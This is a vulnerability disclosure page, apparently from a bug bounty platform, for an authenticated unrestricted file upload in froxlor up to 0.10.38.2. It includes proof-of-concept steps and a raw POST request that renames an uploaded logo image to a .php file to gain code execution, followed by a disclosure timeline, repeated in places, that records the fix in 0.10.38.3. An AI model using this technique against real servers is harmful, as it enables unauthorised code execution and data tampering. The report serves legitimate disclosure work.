froxlor

Valid

Reported on

Nov 7th 2022

Description

Unsafe file uploads occur when the web server fails to sufficiently validate the file’s size, type, name, contents, or what restrictions are placed on the file once it has been successfully uploaded. The application fails to validate files that are uploaded, allowing an attacker to upload unsafe files to the web server and gain access to folders in a directory that are not intended to be accessed.

Proof of Concept

1. Enable a HTTP intercept proxy, such as Burp Suite.

2. Log in to the administrator account.

3. With the HTTP intercept proxy turned on, use a browser to navigate to: System -> Settings -> Panel settings.

4. At the position of Logo Image (Header) or Logo Image (Login) perform the upload function with the file s.jpg.

5. In the proxy software, catch the POST request sent to the `/admin_settings.php`, then change file extension from jpg to php. Finally, forward the request.

6. The result can be arbitrary code execution on the server.

Request

POST /admin_settings.php HTTP/1.1
Host: localhost:8001
Content-Length: 166194
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8001
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySYA7fVL8S7T9epDH
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8001/admin_settings.php?page=overview&part=panel&s=3f573ee5ef049a0728ea376883d4d3d9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="send"

send
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="s"

3f573ee5ef049a0728ea376883d4d3d9
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="page"

overview
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="action"


------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_standardlanguage"

English
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_default_theme"

Sparkle
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_allow_theme_change_customer"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_allow_theme_change_customer"

1
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_allow_theme_change_admin"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_allow_theme_change_admin"

1
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_natsorting"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_natsorting"

1
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_paging"

20
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_pathedit"

Manual
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_adminmail"

admin@localhost
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_adminmail_defname"

Froxlor Administrator
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_adminmail_return"


------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_decimal_places"

4
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_phpmyadmin_url"


------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_webmail_url"


------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_webftp_url"


------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="admin_show_version_login"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="admin_show_version_footer"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="admin_show_news_feed"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="admin_show_news_feed"

1
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="customer_show_news_feed"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="customer_news_feed_url"


------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_allow_domain_change_admin"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_allow_domain_change_customer"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_phpconfigs_hidestdsubdomain"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_imprint_url"


------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_terms_url"


------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_privacy_url"


------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_logo_overridetheme"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_logo_overridecustom"

0
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_logo_image_header"; filename="s.php"
Content-Type: image/jpeg

<image content>
------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="panel_logo_image_login"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundarySYA7fVL8S7T9epDH
Content-Disposition: form-data; name="part"

panel
------WebKitFormBoundarySYA7fVL8S7T9epDH--

Impact

Unsafe file upload can lead to reputational damage for the business due to a loss in confidence from users who are attempting to perform legitimate actions within the application. It can also lead to indirect financial loss due to an attacker reading or manipulating files on the web server.

References

We are processing your report and will contact the froxlor team within 24 hours. a year ago

haidv modified the report

a year ago

We have contacted a member of the froxlor team and are waiting to hear back a year ago

Michael Kaufmann validated this vulnerability a year ago

as per email upfront, thanks again for finding this. It will be resolved in the next release on 2nd of december

haidv has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

haidv

commented a year ago

Researcher

Thanks. Can my vulnerability have bounty or CVE?

Michael Kaufmann marked this as fixed in 0.10.38.3 with commit 4d454a a year ago

Michael Kaufmann has been awarded the fix bounty

This vulnerability will not receive a CVE

This vulnerability is scheduled to go public on Dec 3rd 2022

Michael Kaufmann published this vulnerability a year ago

haidv

commented a year ago

Researcher

May I ask why my report doesn't have CVE like other reports?

haidv

commented 10 months ago

Researcher

Hello, can you assign it a CVE please.

to join this conversation

We are processing your report and will contact the froxlor team within 24 hours. a year ago

haidv modified the report

a year ago

We have contacted a member of the froxlor team and are waiting to hear back a year ago

Michael Kaufmann validated this vulnerability a year ago

as per email upfront, thanks again for finding this. It will be resolved in the next release on 2nd of december

haidv has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

haidv

commented a year ago

Researcher

Thanks. Can my vulnerability have bounty or CVE?

Michael Kaufmann marked this as fixed in 0.10.38.3 with commit 4d454a a year ago

Michael Kaufmann has been awarded the fix bounty

This vulnerability will not receive a CVE

This vulnerability is scheduled to go public on Dec 3rd 2022

Michael Kaufmann published this vulnerability a year ago

haidv

commented a year ago

Researcher

May I ask why my report doesn't have CVE like other reports?

haidv

commented 10 months ago

Researcher

Hello, can you assign it a CVE please.

to join this conversation

froxlor/froxlor <= 0.10.38.2 - Authenticated Unrestricted File Upload to RCE in froxlor/froxlor

Description

Proof of Concept

1. Enable a HTTP intercept proxy, such as Burp Suite.

2. Log in to the administrator account.

3. With the HTTP intercept proxy turned on, use a browser to navigate to: System -> Settings -> Panel settings.

4. At the position of Logo Image (Header) or Logo Image (Login) perform the upload function with the file s.jpg.

5. In the proxy software, catch the POST request sent to the /admin_settings.php, then change file extension from jpg to php. Finally, forward the request.

6. The result can be arbitrary code execution on the server.

Request

Impact

References

5. In the proxy software, catch the POST request sent to the `/admin_settings.php`, then change file extension from jpg to php. Finally, forward the request.